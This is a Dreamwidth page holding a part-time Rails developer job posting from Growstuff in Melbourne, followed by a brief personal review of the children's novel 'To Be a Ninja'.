  • Intermediate level Rails experience (or less Rails experience but strong backend web experience in general). You should be comfortable using an MVC framework, designing data structures, coding complex features, etc.
  • Comfort with CSS and Javascript (we mostly use Bootstrap 3.0 and Leaflet.js) and with light design work (e.g. layout, icons)
  • Familiarity with agile software development, including iteration planning, test driven development, continuous integration, etc.
  • Strong communication skills: you’ll particularly use them for writing web copy, advising on information architecture, and project management.
  • You should be in Melbourne or able to travel regularly to Melbourne to meet with us. Phone, Skype, and screen sharing may also be used — our current developer is based in Ballarat.

We welcome applications from people of diverse backgrounds, and are flexible in our requirements; if you think you have skills that would work, even if they don’t match the above description exactly, please get in touch.

We envision this role being around 8 hours a week ongoing (somewhat flexible, and mostly from your own location). Initially you will work closely with our current developer, who can provide in-depth training/mentoring and documentation on our existing infrastructure and processes. Over the next 3 months you will become increasingly independent, after which time you will be expected to be able to create and maintain high-quality code without close technical supervision.

For more information you can check out:

If you’re interested in working with us, please drop Alex an email at skud@growstuff.org. No resume required — just let us know a bit about yourself, your experience, and why you want to work with us. If you can show us an example of some relevant work you’ve done in the past, that would be fantastic.

[personal profile] miko
Here's a bit of a random one - T picked this book up for me on a lark because I recommended the author's current series. To Be a Ninja is an unrelated kids book about... kids escaping from their drug dealer father and hiding in a secret ninja village?

Getting there is kinda hokey, but I enjoyed the book once it became a going-to-magic-school style young adult novel. I was a bit surprised that it was set up as a series - turns out there is another (and there was a third planned, before the author's other series picked up... he doesn't intend to write it now) that continues it.

Anyway, pleasant read. Interestingly, the author characterizes the girl as the main character (I would have said it was relatively split between her and her brother), but I'm glad to say there was no awkward kid romance (the bane of my re-reading most series in this age range).

Page generated Apr. 21st, 2014 02:00 am
Powered by Dreamwidth Studios